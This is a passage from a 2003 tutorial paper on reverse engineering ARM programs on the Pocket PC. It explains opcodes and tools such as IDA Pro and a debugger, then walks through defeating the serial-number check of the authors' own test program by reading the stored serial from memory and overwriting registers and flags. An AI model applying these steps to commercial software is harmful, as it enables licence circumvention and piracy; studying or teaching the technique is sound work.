which the BL was executed and the stack is used to hold any important register values.
The BL opcode has several variants to its base instruction, just like the B opcode. The
following is a list of the same three variants and what they mean, which will be followed
Page 13 of 13 © 2003 Airscanner™
Corp. http://www.Airscanner.com
by examples. It is important to note that the examples show function calls instead of
address locations. However, if you look at the actual code you will find normal address,
just like the B opcode. The function naming is due to the fact that many BL calls are
made to defined function that will return a value or perform a service. As you investigate
RVEing, you will become very intimate with the BL opcode. Note, the MVT debugger
will not jump to the BL address when doing a line by line execution. It will instead
perform the function and continue to the next line. If you want to watch the code
specified by the BL operate, you will need to specify a breakpoint at the memory address
it branches to. This concept will be discussed later in this paper.
BL
Branch with Link
Always branches
XX XX XX EB
BLEQ
BL if = equal
BL if Z flag = 0
XX XX XX 0B
BLNE
BL if not equal
BL if Z flag = 1
XX XX XX 1B
Examples:
BL AYGSHELL_34
7E 00 00 EB
BLEQ mfcce300_699
5E 3E 00 0B
3.3.2.3 Move (MOV)
A program is constantly moving data around. To facilitate this, registers are updated with
values from other registers and with hard coded integers. These values will then be used
by other operations to make decisions or perform calculations. This is the purpose of the
MOV opcode.
MOV does just what its name implies; it moves information. In addition to basic moves,
this opcode also has the same conditional variants as the B and BL opcode. However, by
this point you should have the general understanding of what the EQ/NE/etc. means to an
instruction set, so it will not be discussed further. Note, most every opcode includes some
form of a conditional variant.
It is important to understand how the MOV instruction works. This command can move
the value of one register into another, or it can move a hard coded value into a register.
However, you should note that the item receiving the data is always a register. The
following will list several examples of the MOV command, what it will do, and its hex
equivalent.
MOV
R2, #1
01 20 A0 E3
Moves the value 1 into register 2
MOV
R3, R1
01 30 A0 E1
Moves value in R1 into R3
MOV
LR, PC
0F E0 A0 E1
Moves value of R15 into R14*
MOV
R1, R1
01 10 A0 E1
Moves value R1 into R1**
* When a call is made to another function, the value of the PC register, which is the
current address location, needs to be stored into the Lr (14) register. This is needed, as
previously mentioned, to hold the address from which BL instruction will need to return.
Page 14 of 14 © 2003 Airscanner™
Corp. http://www.Airscanner.com
** When RVE, you will need ways to create a non-operation. The infamous NOP slide
using 0x90 will not work (as explained later). Instead, you will need to use the MOV
opcode to move a registers value into itself. Nothing is updated, and no flags are changed
when this operation is executed.
3.3.2.4 Compare (CMP)
In a program, a need often arises in which two pieces of information have to be
compared. The results of the comparison are used in numerous ways, from validation of a
serial number, to continuation of a counting loop. The assembler instruction that is
responsible for this is CMP.
The CMP operation can be used to compare the values in two registers with each other,
or a register value and a hard coded value. The results of the comparison do not ouput
any data, but it does change the status flags. As previously discussed, if the two values
are equal, the Zero flag is set to 0, if the values are not equal, the flag is set to 1. This
Zero value is then used by a following opcode to control how or what is executed.
The CMP operation is used in almost every serial number validation. This is
accomplished in two ways. The first is the actual check of the entered serial number with
a hard coded serial number, which can also be done using system functions (i.e. strcmp).
The second is used after the validation check when the program is deciding what piece of
code is to be executed next. Typically, there will be a BEQ or BNE operation that uses
the status of the Zero flag to either send a 'Wrong Serial Number' message to the screen
or to accept the entered serial and allow access to the protected program. This use of the
CMP operation will be discussed further in the example part of this paper.
Another use of the CMP is in a loop function. These are very common because they are
used to assist in counting, string comparisons, file loads, and more. As a result, being able
to recognize a loop in a sequence of assembler programming is an important part of
successfully reverse engineering. The following will provide you with an example of how
a loop looks when debugging a program.
00002AEC
ADD
R1, R4, R7
00002AF0
MOV
R0, R6
00002AF4
BL
sub_002EAC
00002AF8
ADD
R5, R5, #20
00002AFC
ADD
R2, R5, #25
00002A00
CMP
R3, R2
00002A04
BEQ
loc_002AEC
This is a simple loop included in an encryption scheme. In memory address 2A04 you
can see a Branch occurs if the Zero flag is set. This flag is set, or unset, by the CMP
operation at memory address 2A00, which compares the values between R3 and R2. If
the values match, the code execution will jump back to memory address 2AEC.
Page 15 of 15 © 2003 Airscanner™
Corp. http://www.Airscanner.com
The following is an example of two CMP opcodes and their corresponding hex values.
CMP
R2, R3
03 00 52 E1
CMP
R4, #1
01 00 54 E3
3.3.2.5 Load/Store (LDR/STR)
While the registers are able to store small amount of information, the processor must
access the space allotted to it in the RAM to store larger chunks of information. This
includes screen titles, serial numbers, colors, settings, and more. In fact, most everything
that you see when you use a program has at one time resided in memory. The LDR and
STR opcodes are used to write and read this information to and from memory.
While related, these two commands do opposite actions. The LDR instruction loads data
from memory into a register and the STR instruction is used to store the data from the
registry into memory for later usage. However, there is more to this instruction than the
simple transfer of data. In addition to defining where the data is moved, the LDR/STR
command have variations that tell the processor how much data is to be moved. The
follow is a list of these variants and what they mean.
LDR/STR: Move a Words (four bytes) worth of data to or from memory.
LDRB/STRB: Move a Bytes worth of data to or from memory.
LDRH/STRH: Move two Bytes worth of data to or from memory.
LDR/STR commands are different from the other previously discussed instructions in
that they almost always have three pieces of information included with them. This is due
to the way in which the load and store instructions work. Since only a few bytes of data
are moved at best, the program must keep track of where it was last writing to or reading
from. It must then append or read from where it left of from the last read/write. For this
reason, you will often find LDR/STR commands in a loop where they will read in or
write out large amounts of data, one byte at a time.
The LDR/STR instructions are also different from other instructions in that they typically
have three variables controlling where and what data is manipulated. The first variable is
the data that is actually being transferred. The second and third determine where the data
is written, and if it is manipulated before it is permanently stored or loaded. The follow
lists several examples of how these instruction set are used.
STR
R1, [R4, R6]
Store R1 in R4+R6
STR
R1, [R4,R6]!
Store R1 in R4+R6 and write the address in R4
STR
R1, [R4], R6
Store R1 at R4 and write back R4+R6 to R4
STR
R1, [R4, R6, LSL#2]
Store R1 in R4+R6*2 (LSL discussed next)
LDR
R1, [R2, #12]
Load R1 with value at R2+12.
LDR
R1, [R2, R4, R6]
Load R1 with R2+R4+R6
While this provides a good example of how the LDR/STR are used, you should have
Page 16 of 16 © 2003 Airscanner™
Corp. http://www.Airscanner.com
noted two new items that impacted how the opcode performed. The first is the “!”
character that is used to tell the instruction to write back the new information into one of
the registers. The second is the use of the LSL command, which is discussed following
this segment.
Also related to this instruction is the LDM/STM instructions. These are also used to store
or load register values, only they do it on a larger scale. Instead of just moving one value,
like LDR/STR, the LDM/STM instruction stores or loads ALL the register values. This is
most commonly used when a BL occurs. When this happens, the program must be able to
keep track of the original register values, which will be overwritten with values used by
the BL code. So, the STM opcode is used to store key registers onto the stack memory,
and when the branches code is completely executed, the original register values are
loaded back into the registers from memory using the LDM opcode. See the following
chunk of code for an example.
STMFD SP!, {R4,R5,LR}
MOV R0, R4 and more code
LDMFD SP!, {R4,R5,LR}
In this example, R4, R5, and the LR values are placed into memory using the stack
pointer address, which is then updated with the new memory address to account for the
growth of the stack. At then end of the algorithm, R4, R5, and LR are loaded back from
the stack pointer, which is again updated, and the program execution continues.
You should be getting slightly confused at this point. If you are not, then you probably
have had previous experience with assembler, or are just a borne programmer. Don't be
discouraged if you are feeling overwhelmed, for learning how to program in assembler
typically takes months of dedicated study. Fortunately, in the case of reverse engineering,
you don't have to know how to program, but just need to be able to figure out what a
program is doing.
3.3.2.6 Shifting
The final instruction sets we will look at are the shifting operations. These are somewhat
complicated, but a fundamental part of understanding assembler. They are used to
manipulate data held by a register at the binary level. In short, they shift the bit values left
or right (depending on the opcode), which changes the value held by the register. The
follow illustrates how this works with the two most common shifting instruction sets;
LSL and LSR. For the sake of space, we will only be performing shifts on bits 0-7 of a 32
bit value.
LSL: Logical Shift Left – Shift the binary values left by x number of places, using zeros
to fill in the empty spots.
Page 17 of 17 © 2003 Airscanner™
Corp. http://www.Airscanner.com
LSR: Logical Shift Right – Shift the 32 bit values right by x number of places, using
zeros to fill in the empty spots.
While these are the most common shift instructions, there are three others that you may
see. They are Arithmetic Shift Left (ASL), Arithmetic Shift Right (ASR), and Rotate
Right Extended (ROR). All of these shift operations perform the same basic function as
LSL/LSR, with some variations on how they work. For example, the ASL/ASR shifts fill
in the empty bit places with the bit value of register 31. This is used to preserve the sign
bit of the value being held in the register. The ROR shift, on the other hand, carries the
bit value around from bit 0 to bit 31.
3.4 Summary
The previous pages have given you an inside look at the assembler programming
language. You will need this information later in this paper when we practice some of our
RVE skills on a test program. This information is invaluable to you as you attempt to
debug software, looking for holes and security risks.
4 Reverse-Engineering Tools
Reverse engineering software requires several key tools. Each tool allows its user to
interact with the target program in one specific way, and without these tools the reverse
engineering process can take much longer. The following is a breakdown of the types of
tools, and an example of each.
4.1 Hex Editor
As previously described, all computer data is processed as binary code. However, this
code is rather difficult to follow for the human eye, which lead to the creation of hex.
Using the numbers between 0-9 and the letters A-F, any eight digit binary value can be
quickly converted to a one or two character hex value, and vise versa.
While it is importance that a hex editor can convert the program file to its hex equivalent,
3
11
Rsl #4
110000
48
6
110
Rsl #3 (9)
110000
48
12
1100
Rsl #2 (4)
110000
48
27
11000
Rsl #1 (2)
110000
48
48
110000
Lsl #4
0011
3
27
11000
Lsl #3 (9)
0011
3
12
1100
Lsl #2 (4)
0011
3
6
0110
Lsl #1 (2)
0011
3
Page 18 of 18 © 2003 Airscanner™
Corp. http://www.Airscanner.com
what is more important is that a hex editor allows a user to easily alter the hex code to
new values. In addition to basic manipulation, some hex editors also provide search tools,
ASCII views, macros and more.
UltraEdit-32
UltraEdit-32 is a windows based hex editing program that does all of the above and more.
As you can see from figure 2, UltraEdit-32 contains the three basic, but very necessary
fields required to edit hex code. The memory address on the left is used to locate the
particular characters that you want to change. This address will be provided by the
disassembler, which is discussed next. Once the correct line is located, the next step is to
find the hex code in the line that represents the information you want to alter. The ASCII
view, which is not always necessary, can provide some interesting and useful
information, especially if you were changing plain text information in a file.
Figure 2 Ultra Edit screen shot
4.2 Disassemblers
While it would be possible for a person to reverse-engineering a program, as it exists in
hex format, it would be very difficult and would require a very deep understanding of hex
Page 19 of 19 © 2003 Airscanner™
Corp. http://www.Airscanner.com
and binary code. Since this level of knowledge is impractical, the concept of the
disassembler was designed to help us humans find a workable method of communicating
with a computer.
As we previously discussed, there are several levels of languages. The upper languages
like Visual Basic are easy to follow and program with. This is because the syntax of the
language follows spoken language. Unfortunately, a computer cannot directly understand
upper level languages. So, after a program is written, it is compiled, or rewritten using
code a computer can understand. This code, while it actually exists as hex or binary, can
easily be converted to a low level language known as assembler.
Assembler code is relatively basic, once you understand it. While the syntax is different
for each processor type (e.g. RISC, Intel, Motorola), the general commands are relatively
the same. Using a set of opcodes, assembler controls the processor and how it interacts
with RAM and other parts of the computer. In other words, assembler speaks to the heart
and nervous systems of the computer.
Once a program is compiled, it creates a hex file (or set of files) that the computer loads
into memory and reads. As previously mentioned, this code is stored as hex, but is
converted to its binary equivalent and then process by the computer. To facilitate human
understanding, a disassembler takes the same hex file and converts it to assembler code.
Since there is no real difference, other than format and appearance, a person can use the
assembler code to see the path the program takes when it is executed. In addition, a good
disassembler will also provide the user with the information they need to alter the
assembler code, through the use of a hex editor. By researching the code, a hacker can
find the point in the program, for example, that a serial number is checked. They could
then look up the memory location, and use the hex editor to remove the serial number
check from the program.
IDA Pro
By far, IDA Pro (The Interactive Disassembler) is one of the best disassembler programs
on the market. In fact, “IDA Pro was a 2001 PC Magazine Technical Excellence
Award Finalist, defeated only by Microsoft and its Visual Studio .NET”, according to
their web site. While there are many other disassemblers available, some for free, this
program does a marvelous job providing its user with a wide selection of supported
processor types, and a plethora of tools to assist in disassembling.
While we could spend an entire paper delving into the many features and functionality of
this program, it is outside the scope of this paper. However, there are several key features
that need to be outlined.
The first feature is that this program supports more processors than any other
disassembler, and the list keeps growing. In other words, you can disassemble everything
from the processor used in an iPAQ to your desktop computer. In addition to this, IDA
includes several proprietary features that help to identify many of the standard function
Page 20 of 20 © 2003 Airscanner™
Corp. http://www.Airscanner.com
calls made in a program. By providing this information, you do not have to track the code
to the function yourself. Another proprietary feature includes the incorporation of a C like
programming language that can be used to automate certain routines, such as decryption.
However, it is the ease of use and amount of information provided by IDA Pro that
makes it a great program. As you can see in figure 3 IDA Pro provides a wealth of
information, much of it I can't fit on one screen shot. However, in this one shot, you can
IDA has located the functions that are being called, and used their names in place of the
memory address that would normally exist. In addition, you can see that IDA has listed
all the window names, and provides a colorful look at how the data is laid out in the
memory. In IDA 4.21+, the program also provides a graphical diagram of how functions
are tied together.
Figure 3 IDA Pro Screen shot.
4.3 Debuggers
The debugger is the third major program in any reverse-engineers bag of tools. This
program is used to watch the code execute live and helps the reverse engineer watch the
action in real time. Using such a tool, a reverse-engineer can monitor the register values,
status flags, modes, etc. of a program as it executes. In addition, a good debugger will
allow the user to alter the values being used by the program. Memory, registers, status
flags and more can be updated to control the direction of the programs execution. This
type of control can reduce the amount of time a user has to spend working with raw
assembler code.
Due to the limited environment of the PPC platform, and in particular the Pocket PC OS,
there are few choices for a debugger. In fact, there is really only one that actually debugs
live on the PPC device. This debugger is free and is actually included with the SDK from
Page 21 of 21 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Microsoft. To obtain it, go to www.microsoft.com and download embedded Visual Tools.
This will come with VB and VC++ for the Pocket PC OS. While these are programming
tools, the VC++ includes a debugger that is ready for action (see figure 4.
Figure 4:EVC Debugger
We will be demonstrating how this program works in the next section, but the follow is a
list of pointers to help you get started.
To get connected to a program on the PPC, copy it first to the PC and open it from the
local computer.
• The debugger will copy the file BACK over to the PPC device, so be sure to
define where you want the file to go (Project Settings).
• It is best to launch the program using the F11 key. This is the ‘Step into’ function
and will only load the program and place the pointer at the first line of actual
Page 22 of 22 © 2003 Airscanner™
Corp. http://www.Airscanner.com
code. If you use the Run command, you will execute the program as it would
normally execute, which could make it difficult to break cleanly at the point you
want to debug.
• Make extensive use of breakpoints (Alt-F9)
• Use your disassembler to determine the relative address, which corresponds to the
actual address in the debugger.
• If all else fails, use the break option at the top. However, note that this will force a
complete reload of your program for further debugging.
In summary, a debugger is not necessary, but is so helpful that it really should be used.
Debugging on the PPC platform is painfully slow if you use the standard USB/serial
connection that provides the default HotSync connection. If you want much faster access
and response time, take the time to configure you PPC device to Sync up over a network
connection.
5. Practical Reverse-Engineering
Reverse engineering is not a subject that can be learned by simple reading. In order to
understand the intricacies involved, you must practice. This segment will provide a legal
and hands on tutorial on how to bypass a serial protection. This will only describe one
method of circumvention, of only one protection scheme, which means there is more than
one 'right' way to do it. We will use information previously discussed as a foundation.
5.1 Overview
For our example, we will use our own program. This program was written in Visual C++
to provide you with a real working product to test and practice your newly acquired
knowledge. Our program simulates a simple serial number check that imitates those of
many professional programs. You will see first hand how a cracker can reverse-engineer
a program to allow any serial number, regardless of length or value.
5.2 Loading the target
The first step in reverse-engineering a program requires you to tear it apart. This is
accomplished via a disassembler program, one of which is IDA Pro. There are many
other disassemblers available; however, IDA Pro has earned the respect of both
legitimate debuggers and crackers alike for its simplicity, power, and versatility.
To load the target into the disassembler, step through the following steps.
1. Open IDA (click OK through splash screen)
2. Click [New] button at Welcome screen and select test.exe from hard drive, then click
[Open]
3. Check the 'Load resources' box, change the Processor type drop down menu to ARM
processors: ARM and click [OK] as illustrated by figure ??.
4. Click [OK] again if prompted to change processor type.
Page 23 of 23 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Figure 5 IDA Pro loading screen
4. Locate any requested *.dll file and wait for IDA to disassemble program.
Note: You will need to find the requested files on the Windows CE device and transfer
them over to a local folder on your PC. This will allow IDA to fully disassemble the
program. The disassembly of serial.exe will require the mfcee300.dll and olece300.dll.
Other programs may require different *.dll files, which can be found online or on the
PPC device.
5.3 Practical Disassembly
Once the program is open, you should see a screen similar to figure 6, this screen is the
default disassembly screen that shows you the program fully disassembled. On the left
side of the window, you will see a “.text: ########” column that represents the memory
address of the line. The right side of the window holds the disassembled code, which is
processed by the PPC device.
Page 24 of 24 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Figure 6: IDA Pro
In addition to the data on the default screen, you have access to several other important
pieces of information, one of the most helpful of which is the Names window. This dialog
window provides you with a listing of all the functions used by the program. In many
ways, this is a bookmark list that can be used to jump to a particular function or call that
could lead to a valuable piece of code. In this window you will find names such as,
LoadStringW, MessageboxW, wcscmp, wcslen, and more. These are flares to reverse-
engineers because they are often used to read in serial numbers, popup a warning,
compare two strings, or check the length to be sure it is correct. In fact, some programs
call their functions by VERY obvious names, such as ValidSerial or SerialCheck. These
programs might as well include a crack with the program for all the security they have.
However, it is also possible to throw a cracker off track by using this knowledge to
misname windows. Imagine if a program threw in a bogus serial check that only resulted
in a popup window that congratulated the cracker of their fine job!
5.4 Locating a Weakness
From here, a cracker basically has to start digging. While our serial.exe is basic, we can
still see that the Names window still offers us a place to start. If you scroll through the
many names, you will eventually come to the wcscmp function, as illustrated in figure 7.
If you recall, this function is used to compare two values together. To access the point in
the program where the wcscmp function is located, double click on the line.
Page 25 of 25 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Figure 7: Locating wcscmp in Names window
Once the IDA disassembly screen moves to the wcscmp function, you should take note of
a few items. The first is that this function is an imported function from a supporting .dll
(coredll.dll in this case), the second item to notice is the part of the data that is circle in
figure 8. At each function, you will find one or two items listed at the top right corner.
These list the addresses in the program that the function is used. Note, if there are three
dots to the right of the second address listing, this means the function is used more than
twice. To access the list of addresses, simply click on the dots. In larger programs, a
wcscmp function can be called tens, if not hundreds of times. However, we are in luck,
the wcscmp function in serial.exe is only referenced once. To jump to that part of the
disassembled program, double click on the address. Once the IDA screen refreshes itself
with the location of the selected address, it is time to start rebuilding the program.
Page 26 of 26 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Figure 8: Viewing wcscmp function call in IDA
5.5 Reverse-Engineering the Algorithm
Since serial.exe is a relatively simple program, all the code we will need to review and
play with is located within a few lines. They are as follows:
.text:00011224 MOV R4, R0
.text:00011228 ADD R0, SP, #0xC
.text:0001122C BL CString::CString(void)
.text:00011230 ADD R0, SP, #8
.text:00011234 BL CString::CString(void)
.text:00011238 ADD R0, SP, #4
.text:0001123C BL CString::CString(void)
.text:00011240 ADD R0, SP, #0x10
.text:00011244 BL CString::CString(void)
.text:00011248 ADD R0, SP, #0
.text:0001124C BL CString::CString(void)
.text:00011250 LDR R1, =unk_131A4
.text:00011254 ADD R0, SP, #0xC
.text:00011258 BL CString::operator=(ushort)
.text:0001125C LDR R1, =unk_131B0
.text:00011260 ADD R0, SP, #8
.text:00011264 BL CString::operator=(ushort)
.text:00011268 LDR R1, =unk_131E0
.text:0001126C ADD R0, SP, #4
Page 27 of 27 © 2003 Airscanner™
Corp. http://www.Airscanner.com
.text:00011270 BL ; CString::operator=(ushort)
.text:00011274 LDR R1, =unk_1321C
.text:00011278 ADD R0, SP, #0
.text:0001127C BL CString::operator=(ushort)
.text:00011280 MOV R1, #1
.text:00011284 MOV R0, R4
.text:00011288 BL CWnd::UpdateData(int)
.text:0001128C LDR R1, [R4,#0x7C]
.text:00011290 LDR R0, [R1,#-8]
.text:00011294 CMP R0, #8
.text:00011298 BLT loc_112E4
.text:0001129C BGT loc_112E4
.text:000112A0 LDR R0, [SP,#0xC]
.text:000112A4 BL wcscmp
.text:000112A8 MOV R2, #0
.text:000112AC MOVS R3, R0
.text:000112B0 MOV R0, #1
.text:000112B4 MOVNE R0, #0
.text:000112B8 ANDS R3, R0, #0xFF
.text:000112BC LDRNE R1, [SP,#8]
.text:000112C0 MOV R0, R4
.text:000112C4 MOV R3, #0
.text:000112C8 BNE loc_112F4
.text:000112CC LDR R1, [SP,#4]
.text:000112D0 B loc_112F4
.text:000112E4
.text:000112E4 loc_112E4 ; CODE XREF: .text:00011298
.text:000112E4 ; .text:0001129C
.text:000112E4 LDR R1, [SP]
.text:000112E8 MOV R3, #0
.text:000112EC MOV R2, #0
.text:000112F0 MOV R0, R4
.text:000112F4
.text:000112F4 loc_112F4 ; CODE XREF: .text:000112C8
.text:000112F4 ; .text:000112D0
.text:000112F4 BL CWnd__MessageBoxW
If have not touched anything after IDA placed you at address 0x000112A4, then that line
should be highlighted blue. If you want to go back to the last address, use the back arrow
at the top of the window or hit the ESC key.
Since we want to show you several tricks crackers will use when extracting or bypassing
protection, lets start by considering what we are viewing. At first glance at the top of our
code, you can see there is a pattern. A string value appears to be loaded in from program
data, and then a function is called that does something with that value. If we double click
Page 28 of 28 © 2003 Airscanner™
Corp. http://www.Airscanner.com
on unk_131A4, we can see what the first value is “12345678”, or our serial number.
While our serial.exe example is simplified, the fact remains that any data used in a
programs validation must be loaded in from the actual program data and stored in RAM.
As our example illustrates, it doesn't take much to discover to discover a plain text serial
number. In addition, it should be noted that any hex editor can also be used to find this
value, though it may be difficult to parse out a serial number from the many other
character strings that are revealed in a hex editor.
As a result of this plain text problem, many programmers build an algorithm into the
program that deciphers the serial number as it is read in from memory. This will typically
be indicated by a BL to the memory address in the program that handles the
encryption/algorithm. An example of another method of protection is to use the devices
owners name or some other value to dynamically build a serial number. This completely
avoids the problems surrounding storing it within the program file, and indirectly adds an
extra layer of protection on to the program. Despite efforts to create complex and
advanced serial number creation schemes, the simple switch of a 1 to a 0 can nullify
many anti-piracy algorithms, as you will see.
The remaining code from 0x00011250 to 0x0001127C is also used to load in values from
program data to the devices RAM. If you check the values at the address references, you
can quickly see that there are three messages that are loaded into memory as well. One is
a 'Correct serial' message, and the other two are 'Incorrect serial' messages. Knowing that
there are two different messages is a minor, but important tidbit of information because it
tells us that failure occurs in stages or as a result of two different checks.
Moving on through the code, we can see that R1 is loaded with some value out of
memory, which is then used to load another value into R0. After this, in address
0x00011294, we can see that R0 is compared to the number eight (CMP R0,8). The next
two lines then check the results of the comparison, and if it is greater than or less than
eight the program jumps to loc_112E4 and continues from there.
If we follow loc_112E4 in IDA Pro, it starts to get a bit more difficult to determine what
is happening. This brings us to the second phase of the reverse-engineering process; the
live debugger.
5.6 Practical Debugging
Currently, the best debugger for the Pocket PC operating system is Microsoft's eMbedded
Visual C++ program (MVC). This program is part of the Microsoft Visual Tools
package, which is currently free of charge. Once you download it from Microsoft, or a
mirror, install it and open eMbedded Visual C++ (MVC). For the rest of our example, we
will be using the serial.exe program currently being dissected by IDA Pro. You will need
to have your pocket PC device plugged in and connected to your PC to do live
debugging. This can be accomplished using the traditional USB/serial connection, which
is very slow, or using a network (wired or wireless) based sync connection that is 100x
faster. Use the following instructions to get serial.exe loaded into MVC
Page 29 of 29 © 2003 Airscanner™
Corp. http://www.Airscanner.com
1.Obtain a working connection between the PPC and the computer running MVC
2.Start up the MVC
3.Click the Open folder
4.Switch Files of type: to Executable Files (.exe; .dll;.ocx)
5.Locate serial.exe and click Open
Note: Depending on the program you are loading, you may need to adjust the
download directory under Project -> Settings -> Debug tab -> Download Directory.
This tells the MVC to send a copy of the file to that directory on the Pocket PC, which
may be necessary if the program has its own .dlls. Since serial.exe is a one file
program, this setting doesn't matter.
6.Hit the F11 key to execute serial.exe on the Pocket PC and load up the disassembly
information.
7.You will see a connecting dialog box, which should be followed by a CPU mismatch
warning. Click Yes on this warning and the next one. This warning is due to the fact
that you loaded MVC with a local copy of serial.exe, and the CPUfor your local
system doesn't match the Pocket PC device.
8.Click OK for the '...does not contain debugging information.' alert
9.Click Cancel on the .dll requests. For serial.exe you will not need these two dll files.
However, this is not always the case.
You should now be staring at a screen that looks remarkable similar to IDA Pro. The first
thing you will want to do is set a breakpoint at the address location in serial.exe that
corresponds to the location of the previously discussed segment of code (e.g.
0X00011280). However, you should take a moment and look at the address column in the
MVC. As you will quickly see, IDA Pro's memory addresses and the MVC's do not
exactly match.
5.7 Setting Breakpoints
This is because IDA provides a relative address, meaning it will always start at 0. In the
MVC, you will be working with an absolute address, which is based on actual memory
location, not the allocated memory address as in IDA. However, with the exception of the
first two numbers, the addresses will be same. Therefore, take note of the address block
that serial.exe has loaded, and set the breakpoint with this value in mind. For example, if
the first address in the MVC is 0x2601176C, and the address you found in IDA is
0x00011280, the breakpoint should be set at 0x26011280, which exactly we need to do in
our example.
Setting a breakpoint is simple. Simply click Edit Breakpoints or hit Alt-F9. In the
breakpoint window set the breakpoint at '0x26011280', with any changes as defined by
the absolute memory block. Once the breakpoint is entered, hit the F5 key to execute the
program. You should now see a serial screen on your Pocket PC similar to figure 9. Enter
any value in the pocket PC and hit the Submit button.
Page 30 of 30 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Figure 9: Serial.exe default screen
Soon after you click the Submit button, your PC should shift and focus on the section of
code that we looked at earlier in IDA. You should note a little yellow arrow on the left
side of the window pointing to the address of the breakpoint. At this time, right click on
the memory address column and note the menu that appears. You will learn to use this
menu quite frequently when debugging a program.
NOTE: The MVC is very slow when it is in execution mode if using a USB/serial
connection. If you are in the habit of jumping between programs, you will quickly
become frustrated at the time required for the MVC to redraw the screen. To avoid this,
ensure the MVC is in break mode before changing window focus.
Before continuing, you should familiarize yourself with the various tools provided by the
MVC. In particular, there are several windows you will want open while debugging.
These are accessed by right clicking on the tool bar area at the top of the MVC. The three
of interest are as follows:
Registers: This window lets you see the current values held by the registers. This is very
useful because you can determine the registers update as the program executes.
Memory: The memory window lets you look directly in the RAM being used by the
program. This is useful because the registers will often point to a memory location at
which a value is being held.
Call Stack: This window lets you see the task list of the program and allows you to
decipher some of the abstract commands and branches that occur in a program.
5.8 Step-through Investigation
Page 31 of 31 © 2003 Airscanner™
Corp. http://www.Airscanner.com
At this point, serial.exe is loaded on the pocket PC and the MVC is paused at a break
point. The next command the processor is to execute is “MOV R1, #1”. From our
previous discussion on the ARM opcodes, we know that this is a simple command to
move the value 1 into register 1 (R1).
Before executing this line, look at the register window and note the value of R1. You
should also note that all the register values are red. This is because they have all changed
from the last time the program was paused. Next hit the F11 key to execute the next line
of code. After a short pause, the MVC will return to pause mode upon which time you
should note several things. The first is that most of the register values turned to black,
which means they did not change values. The second is that R1 now equals 1.
The next line loads the R0 register with the value in R4. Once again, hit the F11 key to let
the program execute this line of code. After the brief pause, you will see that R0 is equal
to R4. Step through a few more lines of code until your yellow arrow is at address
0x00011290. At this point lets take a look at the Register window.
The last line of code executed was an LDR command that loaded a value (or address
representing the value) from memory into a register. In this case, the value was loaded
into R1, which should be equal to 0006501C. Locate the Memory window and enter the
address stored by R1 into the Address: box. Once you hit enter, you should be staring at
the serial number you entered.
After executing the next line, we can see that R0 is given a small integer value. Take a
second and see if you can determine its significance...OK, enough time. In R0, you
should have a value equal to the number of character in the serial you entered. In other
words, if you entered “777”, the value of R0 should be three, which represents the
number of characters you entered.
The next line, “CMP R0, 8”, is a simple comparison opcode. When this opcode is
executed, it will compare the value in R0 with the integer 8. Depending on the results of
the comparison, the status flags will be updated. These flags are conveniently located at
the bottom of the Registers window. Note their values and hit the F11 key. If the values
change to N1 Z0 C0 O0, your serial number is not eight characters long.
At this point, serial.exe is headed for a failure message (unless you happened to enter
eight characters). The next two lines of code use the results of the CMP check to
determine if the value is greater than or equal to eight. If either is true, the program will
jump to address 0x000112E4 where a message will be displayed on the screen. If you
follow the code, you will see that address 0x000112E4 contains the opcode “LDR R1,
[SP]”. If you follow this through and check the Memory address after this line executes,
you will see that it points to the start of the following error message at address
0x00065014, “Incorrect serial number. Please verify it was typed correctly.”
5.9 Abusing the System
Now that we know the details of the first check, we will want to break the execution and
Page 32 of 32 © 2003 Airscanner™
Corp. http://www.Airscanner.com
restart the entire program. To do this, perform the same steps that you previously worked
through, but set a breakpoint at address 0x00011294 (CMP R0, #8). Once the program is
paused at the CMP opcode, locate the Register window and note the value of R0. Now,
place your cursor on the value and overwrite it with '00000008'. This very handy function
of the MVC will allow you to trick the program into thinking your serial is eight
characters long, thus allowing you to bypass the check. While this works temporarily, we
will need to make a permanent change to the program to ensure any value is acceptable at
a later point.
After the change is made, use the F11 key to watch serial.exe execute through the next
couple lines of code. Continue until the pointer is at address 0x000112A4 (BL
00011754). While this command may not mean much to you in the MVC, if we jump
back over to IDA Pro we can see that this is a function call to wcscmp, which is where
our serial is compared to the correct serial. Knowing this, we should be able to take a
look at the Registers window and determine the correct serial.
NOTE: Function calls that require data to perform their operation use the values held by
the registers. In other words, wcscmp will compare the value R0 with the value of R1,
which means we can easily determine what these values are. It will then return a true or
false in R1.
If we look at R0 and R1, we can see that they hold the values 00064E54 and 0006501C,
respectively, as illustrated by figure 10 (these values may be different for your system).
While these values are not the actual serial numbers, they do represent the location in
memory where the two serials are located. To verify this, place R1’s value in the Memory
windows address field and hit enter. After a short pause, the Memory window should
change and you should see the serial number you entered. Next, do the same with the
value held in R0. This will cause your Memory window to change to a screen similar to
figure 11 where you should see the value '1.2.3.4.5.6.7.8', or in other words, the correct
serial.
Page 33 of 33 © 2003 Airscanner™
Corp. http://www.Airscanner.com
Figure 10: Registers window
Figure 11: Using Memory window
At this point a cracker could stop and simply enter the newfound value to gain full access
to the target program, and then spread that serial number around. However, most serial
validations include some form of dynamically generated serial number (based off of time,
name, or matching registration key), which means any value determined by viewing it in
memory will only work for that local machine. As a result, crackers will often note the
serial number, and continue on to determine where the program can be 'patched' to bypass
the protection regardless of any dynamic serial number.
Moving on through the program, we know the wcscmp function will compare the values
held in memory, which will result in an update to the condition flags and R0 – R4 as
follows.
R0: If serials are equal, R0 = 0, else R0 = 1.
Page 34 of 34 © 2003 Airscanner™
Corp. http://www.Airscanner.com
R1: If equal, address following entered serial number, if not equal, address of failed
character.
R2: If equal then R2=0, else hex value of failed character.
R3: If equal then R3=0, else hex value of correct character.
Therefore, we need to once again trick the program into believing it has the right serial
number. This can be done one of two ways. The first method you can use is to actually
update your serial number in memory. To do this, note the hex values of the correct serial
(i.e. 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38), and overwrite the entered serial
number in the Memory windows. When you are done, your Memory window should look
like figure 12.
Figure 12: Using memory window to update values
Note: Ensure you include the 00 spacers. They are necessary.
The second method a cracker can use is to update the condition flags after the wcscmp
function has updated the status flags. To do this, hit F11 until the pointer is at
0x000112A8. You should note that the Z condition flags change from Z1 (equal) to Z0
(not equal). However, if you don't like this condition, you can change the flags back to
their original value by overwriting them. Once you do this, the program will once again
think the correct serial number was entered. While this will temporarily fix the serial
check, a lasting solution will require an update to the programs code.
